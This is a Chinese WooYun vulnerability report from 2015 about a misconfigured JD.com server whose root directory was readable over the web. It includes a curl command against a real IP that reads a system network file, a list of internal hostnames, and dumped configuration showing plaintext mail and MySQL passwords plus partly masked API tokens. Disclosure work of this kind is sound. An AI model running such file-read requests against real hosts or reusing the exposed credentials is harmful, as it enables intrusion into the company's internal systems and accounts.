当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090992

漏洞标题:京东某站配置不当导致任意文件读取及延伸

相关厂商:京东商城

漏洞作者: 杀器王子

提交时间:2015-01-10 10:55

修复时间:2015-01-15 10:56

公开时间:2015-01-15 10:56

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-10: 细节已通知厂商并且等待厂商处理中
2015-01-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

大量内部信息泄露,多个内部平台(公关平台)可配置host访问,多个内部邮箱泄露

详细说明:

http://111.206.227.125
目测是做了负载均衡的 其中有一台机器有问题

─[0] curl http://111.206.227.125/etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=eth0
BOOTPROTO=static
ONBOOT=yes
IPADDR=172.17.29.86
NETMASK=255.255.255.0
GATEWAY=172.17.29.254


/目录直接映射到了web上
收集信息发现这台机器上的几个业务
tingspider.jd.com
yuqing.jd.com
psm.jd.local
man.psm.jd.local
UMP-Monitor
通过每个站的web.xml为入口 是可以拿到全站源码的

漏洞证明:

京东的舆情监控系统,从各个媒体上抓取信息(是不是有人说坏话?)

Snip20150110_1.png


tingspider是爬虫系统
以下信息仅作证明

###send mail ####
#mail.smtp.host=SMTP.jd.com
#mail.user.name=gemini
#mail.user.password=m0c:DJ@tseTbA


#\u90ae\u4ef6\u914d\u7f6e
mail.host=mail.360buy.com
mail.username=yflijia
mail.password=abcd1981#
mail.from=y
mask 区域
*****a@3*****

.com
receive.mailReceiver=l

mask 区域
*****[email protected];c*****


receive.errorSendInterval=60


## mysql  username password
ting.jdbc.username=ting_rw
ting.jdbc.password=@A3#wacJ9StXyamPNKqkn{w2e
## erp key
ting.h
mask 区域
*****8EC05B4A83EE26F5B18252B6C*****

1BDBF343FAD801CF08E4B5C651264A01520DD
ting.hrm.ws.seed=C60

mask 区域
*****74ABBF9733A*****
*****c.toke*****

4cc2f286abf21086478c1465e8
club.soa.rpc.token=E40D8

mask 区域
*****B4A83EE26F5B18252B*****

197F7C5D91BDBF343FAD801CF08E4B5C651264A01520DD
message.ws.content=E4

mask 区域
*****CEE09A0CAD88C91A774E1D3197F7C*****


ioms.soa.content=E40D832CAFF2C

mask 区域
*****CAD88C91A774E1D3197F7C5D91B*****
*****45A448A7*****

E5EBE551FE9AA6FF322A21210B0D


修复方案:

检查配置

版权声明:转载请注明来源 杀器王子@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-15 10:56

厂商回复:

漏洞Rank:12 (WooYun评价)

最新状态:

暂无